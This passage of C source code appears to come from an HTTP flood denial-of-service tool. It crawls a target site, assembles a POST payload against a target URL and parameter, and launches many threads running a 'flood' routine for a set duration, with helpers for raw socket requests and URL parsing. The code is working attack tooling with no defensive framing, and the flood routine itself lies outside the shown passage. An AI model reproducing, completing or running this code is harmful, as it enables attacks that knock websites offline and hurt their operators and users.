767. char *tmp2 = malloc(strlen(original_domain)+3);
768. bzero(tmp2, strlen(original_domain)+3);
769. sprintf(tmp2, "%s//", original_domain);
770. char *scrapenext_tmp = str_replace(scrapenext, tmp2, tmp);
771. if(scrapenext_tmp != NULL)
772. {
773. free(scrapenext);
774. scrapenext = scrapenext_tmp;
775. }
776. free(tmp);
777. free(tmp2);
778. }
779. freeparts();
780. int alreadyadded = 0;
781. if(headurl->next == headurl)
782. {
783. if(strcmp(headurl->url, scrapenext) == 0)
784. {
785. alreadyadded = 1;
786. }
787. } else {
788. struct urllist *dup = headurl->next;
789. while(dup != headurl)
790. {
791. if(dup->url == NULL)
792. {
793. dup->prev->next = dup->next;
794. dup->next->prev = dup->prev;
795. dup = dup->next;
796. continue;
797. }
798. if(strcmp(dup->url, scrapenext) == 0)
799. {
800. alreadyadded = 1;
801. break;
802. }
803. dup = dup->next;
804. }
805. }
806. if(alreadyadded == 0)
807. {
808. struct urllist *newurl = malloc(sizeof(struct urllist));
809. bzero(newurl, sizeof(struct urllist));
810. newurl->url = scrapenext;
811. newurl->done = 0;
812. newurl->next = headurl->next;
813. newurl->prev = headurl;
814. headurl->next = newurl;
815. }
816. }
817. headurl->done = 1;
818. headurl = headurl->next;
819. free(headerstatus);
820. free(buffer);
821. }
822. END:
823. free(original_domain);
824. } else {
825. freeparts();
826. }
827. setupparts();
828. parseURL(targeturl, returnparts);
829. pthread_t thread[num_threads];
830. struct list *td[num_threads];
831. struct list *node = head->next;
832.  
833.  
834. for(i=0;i<num_threads;i++)
835. {
836. td[i] = node;
837. node = node->next;
838. }
839. postpayload = malloc(4096);
840. sprintf(postpayload, postformat, returnparts[path]->value, returnparts[host]->value, targetparameter);
841. freeparts();
842.  
843. //fprintf(stdout, "Starting Flood...\n");
844.  
845. fnAttackInformation(atoi(argv[argc-1]));
846.  
847. for(i = 0;i<num_threads;i++){
848. pthread_create( &thread[i], NULL, &flood, (void *) td[i]);
849. }
850. sleep(atoi(argv[5]));
851. return 0;
852. }
853. char *geturl(char *url, char *useragent, char *ip)
854. {
855. RETRY:
856. setupparts();
857. parseURL(url, returnparts);
858. struct sockaddr_in serverAddr;
859. bzero(&serverAddr, sizeof(serverAddr));
860. serverAddr.sin_family = AF_INET;
861. serverAddr.sin_port = htons(ATTACKPORT);
862. serverAddr.sin_addr.s_addr = inet_addr(ip);
863. int serverSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
864. unsigned int yes = 1;
865. setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes));
866. if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
867. {
868. printf("GETURL CONNECT FAILED, RETRYING\n");
869. close(serverSocket);
870. freeparts();
871. goto RETRY;
872. }
873. int bytes = 0;
874. char *payload = malloc(8094);
875. bzero(payload, 8094);
876. sprintf(payload, "GET /%s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\nUser-Agent: %s\r\n\r\n", returnparts[path]->value, returnparts[host]->value, useragent);
877. freeparts();
878. bytes = send(serverSocket, payload, strlen(payload), MSG_NOSIGNAL);
879. if(bytes == -1)
880. {
881. printf("GETURL SEND FAILED, SITE CLOSED CONNECTION, RETRYING\n");
882. close(serverSocket);
883. goto RETRY;
884. }
885. int total = 0;
886. int currentsize = 4096;
887. char *buffer = malloc(4096);
888. bzero(buffer, 4096);
889. bytes = recv(serverSocket, buffer, 4096, 0);
890. while(bytes > 0)
891. {
892. total += bytes;
893. if(total+4096 > currentsize)
894. {
895. char *new_buffer = malloc(total+4096);
896. bzero(new_buffer, total+4096);
897. memcpy(new_buffer, buffer, total);
898. free(buffer);
899. buffer = new_buffer;
900. currentsize = total+4096;
901. }
902. bytes = recv(serverSocket, buffer+total, 4096, 0);
903. }
904. return buffer;
905. }
906. void freeparts()
907. {
908. return;
909. if(returnparts[0]!=NULL) { free(returnparts[0]); }
910. if(returnparts[1]!=NULL) { free(returnparts[1]); }
911. if(returnparts[2]!=NULL) { free(returnparts[2]); }
912. if(returnparts[3]!=NULL) { free(returnparts[3]); }
913. if(returnparts[4]!=NULL) { free(returnparts[4]); }
914. if(returnparts[5]!=NULL) { free(returnparts[5]); }
915. if(returnparts[6]!=NULL) { free(returnparts[6]); }
916. if(returnparts[7]!=NULL) { free(returnparts[7]); }
917. if(returnparts[8]!=NULL) { free(returnparts[8]); }
918. return;
919. }
920. void setupparts()
921. {
922. returnparts[0] = malloc(sizeof(struct urlparts));
923. returnparts[1] = malloc(sizeof(struct urlparts));
924. returnparts[2] = malloc(sizeof(struct urlparts));
925. returnparts[3] = malloc(sizeof(struct urlparts));
926. returnparts[4] = malloc(sizeof(struct urlparts));
927. returnparts[5] = malloc(sizeof(struct urlparts));
928. returnparts[6] = malloc(sizeof(struct urlparts));
929. returnparts[7] = malloc(sizeof(struct urlparts));
930. returnparts[8] = malloc(sizeof(struct urlparts));
931. bzero(returnparts[0], sizeof(struct urlparts));
932. bzero(returnparts[1], sizeof(struct urlparts));
933. bzero(returnparts[2], sizeof(struct urlparts));
934. bzero(returnparts[3], sizeof(struct urlparts));
935. bzero(returnparts[4], sizeof(struct urlparts));
936. bzero(returnparts[5], sizeof(struct urlparts));
937. bzero(returnparts[6], sizeof(struct urlparts));
938. bzero(returnparts[7], sizeof(struct urlparts));
939. bzero(returnparts[8], sizeof(struct urlparts));
940. returnparts[0]->name = "scheme";
941. strcpy(returnparts[0]->separator, ":");
942. returnparts[1]->name = "userid";
943. strcpy(returnparts[1]->separator, "@");
944. returnparts[2]->name = "password";
945. strcpy(returnparts[2]->separator, ":");
946. returnparts[3]->name = "host";
947. strcpy(returnparts[3]->separator, "//");
948. returnparts[4]->name = "port";
949. strcpy(returnparts[4]->separator, ":");
950. returnparts[5]->name = "path";
951. strcpy(returnparts[5]->separator, "/");
952. returnparts[6]->name = "param";
953. strcpy(returnparts[6]->separator, ";");
954. returnparts[7]->name = "query";
955. strcpy(returnparts[7]->separator, "?");
956. returnparts[8]->name = "fragment";
957. strcpy(returnparts[8]->separator, "#");
958. return;
959. }
960. int parseURL(char *url, struct urlparts **returnpart) {
961. register i;
962. int seplen;
963. char * remainder;
964. char * regall = ":/;?#";
965. char * regpath = ":;?#";
966. char * regx;
967. if(!*url)
968. {
969. strcpy(parseError, "nothing to do!\n");
970. return 0;
971. }
972. if((remainder = malloc(strlen(url) + 1)) == NULL)
973. {
974. printf("cannot allocate memory\n");
975. exit(-1);
976. }
977. strcpy(remainder, url);
978. if(firstpunc(remainder) == ':')
979. {
980. strcpy(returnpart[scheme]->value, strsplit(remainder, returnpart[scheme]->separator));
981. strleft(remainder, 1);
982. }
983. if (!strcmp(returnpart[scheme]->value, "mailto"))
984. *(returnpart[host]->separator) = 0;
985. for(i = 0; i < NUMPARTS; i++)
986. {
987. if(!*remainder)
988. break;
989. if(i == scheme || i == userid || i == password)
990. continue;
991. if(i == host && strchr(remainder, '@'))
992. {
993. if(!strncmp(remainder, "//", 2))
994. strleft(remainder, 2);
995. strcpy(returnpart[userid]->value, strsplit(remainder, ":@"));
996. strleft(remainder, 1);
997. if(strchr(remainder, '@'))
998. {
999. strcpy(returnpart[password]->value, strsplit(remainder, "@"));
1000. strleft(remainder, 1);
1001. }
1002. *(returnpart[host]->separator) = 0;
1003. }
1004. if(i == path && (! *(returnpart[scheme]->value)))
1005. {
1006. *(returnpart[path]->separator) = 0;
1007. strcpy(returnpart[scheme]->value, "http");
1008. }
1009. regx = (i == path) ? regpath : regall ;
1010. seplen = strlen(returnpart[i]->separator);
1011. if(strncmp(remainder, returnpart[i]->separator, seplen))
1012. continue;
1013. else
1014. strleft(remainder, seplen);
1015. strcpy(returnpart[i]->value, strsplit(remainder, regx));
1016. }
1017. if(*remainder)
1018. sprintf(parseError, "I don't understand '%s'", remainder);
1019. free(remainder);
1020. return 0;
1021. }
1022. char *str_replace(char *orig, char *rep, char *with) {
1023. char *result;
1024. char *ins;
1025. char *tmp;
1026. int len_rep;
1027. int len_with;
1028. int len_front;
1029. int count;
1030. if (!orig)
1031. return NULL;
1032. if (!rep || !(len_rep = strlen(rep)))
1033. return NULL;
1034. if (!(ins = strstr(orig, rep)))
1035. return NULL;
1036. if (!with)
1037. with = "";
1038. len_with = strlen(with);
1039. for (count = 0; tmp = strstr(ins, rep); ++count) {
1040. ins = tmp + len_rep;
1041. }
1042. tmp = result = malloc(strlen(orig) + (len_with - len_rep) * count + 1);
1043. if (!result)
1044. return NULL;
1045. while (count--) {
1046. ins = strstr(orig, rep);
1047. len_front = ins - orig;
1048. tmp = strncpy(tmp, orig, len_front) + len_front;
1049. tmp = strcpy(tmp, with) + len_with;
1050. orig += len_front + len_rep;
1051. }
1052. strcpy(tmp, orig);
1053. return result;
1054. }
1055. char *stristr(const char *String, const char *Pattern)
1056. {
1057. char *pptr, *sptr, *start;
1058. uint slen, plen;
1059. for (start = (char *)String,
1060. pptr = (char *)Pattern,
1061. slen = strlen(String),
1062. plen = strlen(Pattern);
1063. slen >= plen;
1064. start++, slen--)
1065. {
1066.  
1067. while (toupper(*start) != toupper(*Pattern))
1068. {
1069. start++;
1070. slen--;
1071.  
1072. if (slen < plen)
1073. return(NULL);
1074. }
1075. sptr = start;
1076. pptr = (char *)Pattern;
1077. while (toupper(*sptr) == toupper(*pptr))
1078. {
1079. sptr++;
1080. pptr++;
1081.  
1082. if ('\0' == *pptr)
1083. return (start);
1084. }
1085. }
1086. return(NULL);
1087. }
1088. char * strsplit(char * s, char * tok) {
1089. #define OUTLEN (255)
1090. register i, j;
1091. static char out[OUTLEN + 1];
1092. for(i = 0; s[i] && i < OUTLEN; i++)
1093. {
1094. if(strchr(tok, s[i]))
1095. break;
1096. else
1097. out[i] = s[i];
1098. }
1099. out[i] = 0;
1100. if(i && s[i])
1101. {
1102. for(j = 0; s[i]; i++, j++) s[j] = s[i];
1103. s[j] = 0;
1104. }
1105. else if (!s[i])
1106. *s = 0;
1107. return out;
1108. }
1109. char firstpunc(char * s) {
1110. while(*s++)
1111. if(!isalnum(*s)) return *s;
1112. return 0;
1113. }
1114. int strleft(char * s, int n) {
1115. int l;
1116. l = strlen(s);
1117. if(l < n)
1118. return -1;
1119. else if (l == n)
1120. *s = 0;
1121. memmove(s, s + n, l - n + 1);
1122. return n;
1123. }